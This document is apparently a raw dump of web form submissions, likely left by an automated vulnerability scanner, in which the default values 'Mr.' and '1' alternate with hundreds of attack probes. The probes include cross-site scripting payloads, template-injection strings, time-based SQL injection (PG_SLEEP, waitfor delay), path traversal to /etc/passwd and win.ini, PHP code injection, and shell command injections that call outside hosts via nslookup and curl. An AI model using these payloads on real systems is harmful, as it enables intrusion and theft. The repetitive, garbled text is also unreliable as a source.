Mr.
1
Mr.<svg
1
Mr.<svg
1
Mr.<InvalidTag
1
Mr.
1
Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9646></ScRiPt>
1
Mr.
1
Mr.<InvalidTag
1
Mr.
1
Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%31%4D%48%78%28%39%31%35%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
Mr.
1
Mr.<InvalidTag>1MHx(9551)</script>
1
Mr.
1
Mr.
1
Mr.
<a HrEF=jaVaScRiPT:>
Mr.
1
Mr.<WYQEQH>YQY9I[!+!]</WYQEQH>
1
Mr.<InvalidTag >1MHx(9704)</ScRiPt>
1
Mr.
1
Mr.
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
Mr.
1
Mr.
1
dfb__${98991*97996}__::.x
1
Mr.
1
Mr.
�<img zzz onmouseover=BPQi(96041) //�>
dfb[[${98991*97996}]]xca
1
Mr.
1
dfb{{98991*97996}}xca
1
dfb{{98991*97996}}xca
1
Mr.
1
Mr.
1
Mr.
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
<th:t="${dfb}#foreach
1
Mr.
1
Mr.
1
Mr.
1
<%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
bfgx8322%C0%BEz1%C0%BCz2a%90bcxhjl8322
1
bfg9441%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9441
1
Mr.
1
Mr.
1<InvalidTag
>BPQi(9193)</ScRiPt>
Mr.
1
Mr.
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
dfb__${98991*97996}__::.x
1
Mr.
1
dfb[[${98991*97996}]]xca
1
Mr.
1
dfb{{98991*97996}}xca
1
Mr.
1
Mr.
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<InvalidTag >BPQi(9937)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
<th:t="${dfb}#foreach
1
Mr.
1
Mr.
1
Mr.
1
<%={{={@{#{${dfb}}%>
1
Mr.
1
bfgx1603%C0%BEz1%C0%BCz2a%90bcxhjl1603
1
Mr.
1
bfg6236%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6236
1
Mr.
1
Mr.
1
Mr.9553171
1
Mr.
1
'"()&%<zzz><InvalidTag >1MHx(9766)</ScRiPt>
1
Mr.
1
Mr.'"()&%<zzz><InvalidTag >1MHx(9962)</ScRiPt>
1
Mr.
1
Mr.
19221802
Mr.
1
Mr.
'"()&%<zzz><InvalidTag >ZwHc(9642)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1'"()&%<zzz><InvalidTag >ZwHc(9805)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
@@yIdX7
Mr.
1 ����%2527%2522
Mr.
1'"
Mr.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
8ARqkLMH')) OR 374=(SELECT 374 FROM PG_SLEEP(15))--
Mr.
fnQ6agjZ') OR 894=(SELECT 894 FROM PG_SLEEP(15))--
Mr.
huVRELR6' OR 110=(SELECT 110 FROM PG_SLEEP(15))--
Mr.
-1)) OR 537=(SELECT 537 FROM PG_SLEEP(15))--
Mr.
-5) OR 370=(SELECT 370 FROM PG_SLEEP(15))--
Mr.
-5 OR 749=(SELECT 749 FROM PG_SLEEP(15))--
Mr.
Xeqs2Q4F')); waitfor delay '0:0:15' --
Mr.
7UhAn3jT'); waitfor delay '0:0:15' --
Mr.
97AlyWzz'; waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1; waitfor delay '0:0:15' --
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
-1" OR 3*2>(0+5+571-571) --
Mr.
-1" OR 3*2<(0+5+571-571) --
Mr.
-1" OR 3+571-571-1=0+0+0+1 --
Mr.
-1" OR 2+571-571-1=0+0+0+1 --
Mr.
-1' OR 3*2>(0+5+476-476) or 'ugUgQZmC'='
Mr.
-1' OR 3*2<(0+5+476-476) or 'ugUgQZmC'='
Mr.
-1' OR 3+476-476-1=0+0+0+1 or 'ugUgQZmC'='
Mr.
-1' OR 2+476-476-1=0+0+0+1 or 'ugUgQZmC'='
Mr.
-1' OR 3*2>(0+5+933-933) --
Mr.
-1' OR 3*2<(0+5+933-933) --
Mr.
-1' OR 3+933-933-1=0+0+0+1 --
Mr.
-1' OR 2+933-933-1=0+0+0+1 --
Mr.
-1 OR 3*2>(0+5+809-809)
Mr.
-1 OR 3*2<(0+5+809-809)
Mr.
-1 OR 3+809-809-1=0+0+0+1
Mr.
-1 OR 2+809-809-1=0+0+0+1
Mr.
-1 OR 3*2>(0+5+96-96) --
Mr.
-1 OR 3*2<(0+5+96-96) --
Mr.
-1 OR 3+96-96-1=0+0+0+1 --
Mr.
-1 OR 2+96-96-1=0+0+0+1 --
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
1
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
1
@@KfBv4
1
1 ����%2527%2522
1
1'"
1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
GtC3kAae')) OR 93=(SELECT 93 FROM PG_SLEEP(15))--
1
vl9eNsyj') OR 547=(SELECT 547 FROM PG_SLEEP(15))--
1
643uoWs3' OR 878=(SELECT 878 FROM PG_SLEEP(15))--
1
mVozTE6C')); waitfor delay '0:0:15' --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
W9T4anLO'); waitfor delay '0:0:15' --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
C8g5P29B'; waitfor delay '0:0:15' --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
1 waitfor delay '0:0:15' --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
Mr.
1
Mr.
dfb__${98991*97996}__::.x
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
Mr.
1
Mr.
1<auWa3y3<
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<img sRc='http://attacker-9419/log.php?
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<atTTjO9 x=9348>
Mr.
1<ifRAme sRc=9149.com></IfRamE>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<WMUKOX>07VWQ[!+!]</WMUKOX>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1FXeFA
<InvalidTag >eKlN(9799)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1}body{zzz:Expre/**/SSion(eKlN(9283))}
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
<a HrEF=jaVaScRiPT:>
Mr.
1
Mr.
1
Mr.
c:/windows/win.ini
Mr.
<a HrEF=http://xss.bxss.me></a>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<input autofocus onfocus=eKlN(9779)>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
�<img zzz onmouseover=eKlN(94391) //�>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Http://bxss.me/t/fit.txt
Mr.
1
Mr.
1
Mr.
1
Mr.
1<ScRiPt>eKlN(9018)</sCripT>
Mr.
1
Mr.
1
Mr.
1\u003CScRiPt\eKlN(9069)\u003C/sCripT\u003E
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
Mr.
1
Mr.
1
Mr.
1
Mr.
%31%3C%53%63%52%69%50%74%20%3E%65%4B%6C%4E%289997%29%3C%2F%73%43%72%69%70%54%3E
Mr.
1
Mr.
1
Mr.
1<img/src=">" onerror=alert(9603)>
Mr.
bxss.me
Mr.
1
Mr.
1
Mr.
1
Mr.
c:/windows/win.ini
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<img src=xyz OnErRor=eKlN(9372)>
Mr.
1
Mr.
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
Mr.
1
Mr.
1
Mr.
1<img src=//xss.bxss.me/t/dot.gif onload=eKlN(9241)>
Mr.
1
Mr.
1
Mr.
1
Mr.
/etc/shells
Mr.
1<body onload=eKlN(9680)>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
http://bxss.me/t/fit.txt%3F.jpg
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9429'>
Mr.
Http://bxss.me/t/fit.txt
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
Mr.
1<isindex type=image src=1 onerror=eKlN(9804)>
Mr.
1
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<svg
� onload=eKlN(9270);>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<InvalidTag
>eKlN(9501)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9327></ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<InvalidTag
>eKlN(9746)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%65%4B%6C%4E%28%39%34%31%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
Mr.
1
Mr.
1
Mr.
1
if(now()=sysdate(),sleep(15),0)
1
if(now()=sysdate(),sleep(15),0)
1
Mr.
1
Mr.
1
Mr.
1<InvalidTag>eKlN(9947)</script>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<WJQHWN>TIUGC[!+!]</WJQHWN>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<InvalidTag >eKlN(9240)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
dfb__${98991*97996}__::.x
bxss.me
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
c:/windows/win.ini
1
c:/windows/win.ini
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
dfb[[${98991*97996}]]xca
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
dfb{{98991*97996}}xca
Mr.
1
Mr.
1
Mr.
1
/etc/shells
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
http://bxss.me/t/fit.txt%3F.
1
Mr.
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Http://bxss.me/t/fit.txt
1
Http://bxss.me/t/fit.txt
1
Mr.
1
Mr.
1
Mr.
1
Mr.
${9999469+9999926}
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
<th:t="${dfb}#foreach
Mr.
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.
1
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
<%={{={@{#{${dfb}}%>
Mr.
1
Mr.
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.
1
${10000028+9999697}
1
Mr.
1
Mr.
1
Mr.
1
Mr.
bfgx5991%C0%BEz1%C0%BCz2a%90bcxhjl5991
Mr.
1
Mr.
1
Mr.
bfg7658%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7658
Mr.
1
-1" OR 2+38-38-1=0+0+0+1 --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
-1' OR 2+269-269-1=0+0+0+1 or 'M6EkW7h6'='
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
19536543
-1' OR 2+615-615-1=0+0+0+1 --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
-1 OR 2+762-762-1=0+0+0+1
1
-1 OR 2+762-762-1=0+0+0+1
1
Mr.
1
Mr.
1
Mr.
'"()&%<zzz><InvalidTag >eKlN(9361)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1'"()&%<zzz><InvalidTag >eKlN(9948)</ScRiPt>
Mr.
1
-1 OR 3*2>(0+5+668-668) --
1
-1 OR 3*2>(0+5+668-668) --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1<esi:include src="http://bxss.me/rpb.png"/>
-1 OR 3*2<(0+5+668-668) --
1
-1 OR 3*2<(0+5+668-668) --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1RlAPvXCO
Mr.
1
Mr.
1<esi:include src="http://bxss.me/rpb.png"/>
Mr.
1
Mr.
'"
Mr.
1
Mr.
1
Mr.
1qk5EdVlO
Mr.
<!--
Mr.
1
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
-1 OR 3+668-668-1=0+0+0+1 --
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
'"
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
-1 OR 2+668-668-1=0+0+0+1 --
1
Mr.
1
Mr.
1
Mr.<esi:include src="http://bxss.me/rpb.png"/>
1
1LM39pGpO
1
1LM39pGpO
1
Mr.
1
Mr.
1
Mr.
1
wtEvxFXO
1
Mr.
1
Mr.
1
Mr.9171006
1
Mr.9171006
1
Mr.
1
Mr.
1
Mr.
1
'"()&%<zzz><InvalidTag >eKlN(9767)</ScRiPt>
1
'"()&%<zzz><InvalidTag >eKlN(9767)</ScRiPt>
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.'"()&%<zzz><InvalidTag >eKlN(9807)</ScRiPt>
1
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
${@print(md5(31337))}
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
<!--
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
1
Mr.
1
Mr.
1
Mr.
1"||sleep(27*1000)*reajka||"
Mr.
1
Mr.
1
'"
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
'.print(md5(31337)).'
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
${@print(md5(31337))}\
Mr.
1
Mr.
;(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)|(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)&(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)
Mr.
1
Mr.
../1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
`(nslookup -q=cname hitlegvygemwwc5606.bxss.me||curl hitlegvygemwwc5606.bxss.me)`
Mr.
1
Mr.
${@print(md5(31337))}
Mr.
1
Mr.
1
Mr.
1
Mr.
'"()
Mr.
1
Mr.
file:///etc/passwd
Mr.
1
Mr.
1
Mr.
";print(md5(31337));$a="
Mr.
1
Mr.
1"||sleep(27*1000)*nffodd||"
Mr.
1
Mr.
1
Mr.
1
Mr.
|(nslookup -q=cname hitdemndaaozid0550.bxss.me||curl hitdemndaaozid0550.bxss.me)
Mr.
1
Mr.
../../../../../../../../../../../../../../windows/win.ini
Mr.
1
Mr.
';print(md5(31337));$a='
Mr.
1
Mr.
1
Mr.
1
Mr.
1'||sleep(27*1000)*irqefi||'
Mr.
1
Mr.
1
Mr.
1
Mr.
../../../../../../../../../../../../../../etc/passwd
Mr.
1
Mr.
1
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1"&&sleep(27*1000)*jnymwc&&"
Mr.
1
Mr.
./1
Mr.
1
Mr.
1
Mr.
1
Mr.
1'&&sleep(27*1000)*pcxqbl&&'
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Mr.
Mr.
1
Mr.
1
Mr.
&nslookup -q=cname hitdrqkwxvxoz800af.bxss.me&'\"`0&nslookup -q=cname hitdrqkwxvxoz800af.bxss.me&`'
Mr.
../1
Mr.
'"()
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
xfs.bxss.me
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Mr.
file:///etc/passwd
Mr.
1
Mr.
1
Mr.
^(#$!@#$)(()))******
Mr.
1
Mr.
|echo btbsag$()\ niqryn\nz^xyu||a #' |echo btbsag$()\ niqryn\nz^xyu||a #|" |echo btbsag$()\ niqryn\nz^xyu||a #
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
&echo ddgiwz$()\ nelfki\nz^xyu||a #' &echo ddgiwz$()\ nelfki\nz^xyu||a #|" &echo ddgiwz$()\ nelfki\nz^xyu||a #
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
1
Mr.
1
xfs.bxss.me
1
xfs.bxss.me
1
Mr.
1
Mr.
)
Mr.
Mr.
1
Mr.
1
Mr.
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
Mr.
;(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)|(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)&(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)
Mr.
1
Mr.
^(#$!@#$)(()))******
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
".gethostbyname(lc("hites"."czbuzadva79f8.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(68).chr(101).chr(66)."
Mr.
../../../../../../../../../../../../../../windows/win.ini
Mr.
1
Mr.
Mr.
1
Mr.
`(nslookup -q=cname hitdyqqkzrhqe64813.bxss.me||curl hitdyqqkzrhqe64813.bxss.me)`
Mr.
1
Mr.
1
Mr.
1
Mr.
!(()&&!|*|*|
Mr.
1
Mr.
'.gethostbyname(lc('hitrh'.'qzwmwqtj805e5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(84).chr(108).chr(89).'
Mr.
1
Mr.
../../../../../../../../../../../../../../etc/passwd
Mr.
|(nslookup -q=cname hitzybmewremcb452b.bxss.me||curl hitzybmewremcb452b.bxss.me)
Mr.
)
Mr.
1
Mr.
Mr.
&(nslookup -q=cname hithwwmjnhogl5c164.bxss.me||curl hithwwmjnhogl5c164.bxss.me)&'\"`0&(nslookup -q=cname hithwwmjnhogl5c164.bxss.me||curl hithwwmjnhogl5c164.bxss.me)&`'
Mr.
".gethostbyname(lc("hitqq"."bhjxupssc168e.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(84).chr(98).chr(87)."
Mr.
1
Mr.
1
Mr.
1
'.print(md5(31337)).'
1
'.print(md5(31337)).'
1
Mr.
1
Mr.
1
Mr.
&nslookup -q=cname hitzfkknhothi3db79.bxss.me&'\"`0&nslookup -q=cname hitzfkknhothi3db79.bxss.me&`'
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
${@print(md5(31337))}\
1
${@print(md5(31337))}\
1
Mr.
'.gethostbyname(lc('hitwy'.'gjgodztwff680.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(70).chr(118).chr(90).'
Mr.
1
Mr.
$(nslookup -q=cname hitoidbfsfsoz4951c.bxss.me||curl hitoidbfsfsoz4951c.bxss.me)
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
${@print(md5(31337))}
1
${@print(md5(31337))}
1
Mr.
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr."||sleep(27*1000)*zzysxa||"
1
Mr.
1
Mr.
1
";print(md5(31337));$a="
1
";print(md5(31337));$a="
1
Mr.
1
Mr.
1
Mr.'||sleep(27*1000)*pzhybi||'
1
Mr.'||sleep(27*1000)*pzhybi||'
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
(nslookup -q=cname hittbanynvdbbb0d8d.bxss.me||curl hittbanynvdbbb0d8d.bxss.me))
Mr.
1
Mr.
Mr.
1
';print(md5(31337));$a='
1
Mr.
|echo yjvprl$()\ dpgguk\nz^xyu||a #' |echo yjvprl$()\ dpgguk\nz^xyu||a #|" |echo yjvprl$()\ dpgguk\nz^xyu||a #
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr."&&sleep(27*1000)*kzuoxh&&"
1
Mr.
1
Mr.
1
".gethostbyname(lc("hitny"."sohpanfv3978c.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(83).chr(110).chr(87)."
1
Mr.
1
Mr.
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
Mr.
&echo ruaaoz$()\ hnmuet\nz^xyu||a #' &echo ruaaoz$()\ hnmuet\nz^xyu||a #|" &echo ruaaoz$()\ hnmuet\nz^xyu||a #
Mr.
1
Mr.
1
Mr.
1
'.gethostbyname(lc('hitjm'.'dygusmuc47a67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(102).chr(78).'
1
'.gethostbyname(lc('hitjm'.'dygusmuc47a67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(102).chr(78).'
1
Mr.
1
Mr.
echo jigmwp$()\ pqwpwm\nz^xyu||a #' &echo jigmwp$()\ pqwpwm\nz^xyu||a #|" &echo jigmwp$()\ pqwpwm\nz^xyu||a #
Mr.
1
Mr.'&&sleep(27*1000)*zfytzj&&'
1
Mr.'&&sleep(27*1000)*zfytzj&&'
1
Mr.
1
Mr.
1
Mr.
1
WEB-INF\web.xml
1
WEB-INF\web.xml
1
Mr.
1
Mr.
1
Mr.
1
'"()
1
^(#$!@#$)(()))******
1
^(#$!@#$)(()))******
1
Mr.
1
Mr.
1
!(()&&!|*|*|
1
!(()&&!|*|*|
1
Mr.
1
WEB-INF/web.xml
1
WEB-INF/web.xml
1
Mr.
1
Mr.
1
1
1
Mr.
1
Mr.
1
